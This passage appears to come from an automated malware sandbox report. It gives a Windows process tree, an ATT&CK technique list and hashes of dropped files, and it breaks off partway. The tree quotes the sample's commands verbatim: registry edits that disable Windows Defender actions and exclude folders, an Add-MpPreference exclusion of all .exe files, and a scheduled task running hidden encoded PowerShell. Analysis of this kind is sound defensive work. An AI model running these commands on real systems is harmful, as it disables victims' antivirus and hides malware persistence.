  C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 380
  2⤵
  - Program crash
  PID:9204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 7376 -ip 7376
1⤵
PID:7468

C:\Users\Admin\AppData\Local\Temp\E2BB.exe
C:\Users\Admin\AppData\Local\Temp\E2BB.exe
1⤵
PID:2540
- C:\Users\Admin\AppData\Local\Temp\is-VGI97.tmp\E2BB.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-VGI97.tmp\E2BB.tmp" /SL5="$303F4,4074059,54272,C:\Users\Admin\AppData\Local\Temp\E2BB.exe"
  2⤵
  PID:2984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7372 -ip 7372
1⤵
PID:8448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7372 -ip 7372
1⤵
PID:8280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7372 -ip 7372
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5584

C:\Users\Admin\AppData\Local\Temp\48C.exe
C:\Users\Admin\AppData\Local\Temp\48C.exe
1⤵
PID:5848
- C:\Users\Admin\AppData\Local\Temp\is-THKQ9.tmp\48C.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-THKQ9.tmp\48C.tmp" /SL5="$20460,4502673,54272,C:\Users\Admin\AppData\Local\Temp\48C.exe"
  2⤵
  PID:1212
- - C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe
    "C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe" -i
    3⤵
    PID:8280
- - C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe
    "C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe" -s
    3⤵
    PID:5128

C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe
C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe Lw /yBsite_idjQg 525403 /S
1⤵
PID:6852
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6448
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8152
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AYihtnKUEzNvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AYihtnKUEzNvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KqXbavCVBAoU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KqXbavCVBAoU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YoIROqlkSylWiuqmRuR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YoIROqlkSylWiuqmRuR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hWvuMSnmtaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hWvuMSnmtaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qLISRvQaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qLISRvQaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kFtOkElpwyMNPVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kFtOkElpwyMNPVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HLfrKneGcZPtnWVS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HLfrKneGcZPtnWVS\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:6812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5448
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KqXbavCVBAoU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KqXbavCVBAoU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YoIROqlkSylWiuqmRuR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YoIROqlkSylWiuqmRuR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hWvuMSnmtaUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hWvuMSnmtaUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qLISRvQaU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qLISRvQaU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kFtOkElpwyMNPVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kFtOkElpwyMNPVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HLfrKneGcZPtnWVS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HLfrKneGcZPtnWVS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gwdUevBUP" /SC once /ST 04:47:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:8268
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gwdUevBUP"
  2⤵
  PID:5156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5392 -ip 5392
1⤵
PID:6940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 8452 -ip 8452
1⤵
PID:1588

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:4580
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:7180
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:6928

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
1⤵
PID:6096
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:8168

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:7672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6292 -ip 6292
1⤵
PID:8560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2116

C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
1⤵
PID:6816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\BackupAssert.pdf

Filesize
867KB

MD5
b2cd526cb2b843df1ecfedf1ddbe658d

SHA1
0ab03425bcd48ef7bdf422e42c38a6ce9b921ff1

SHA256
98a68467f915fec9491147f1353f02b0b7a2495260d8a944327022f24a950d15

SHA512
cdf87b5c5a8e24881b615ceacb1af53cb74576abb602d88ce10792afc2e2770c84e6c93f7a8f164512358ebabf673b42c28701734d33d4f150eb14dbb7ab4f4e

Download Submit
C:\ProgramData\CAFBGDHC

Filesize
112KB

MD5
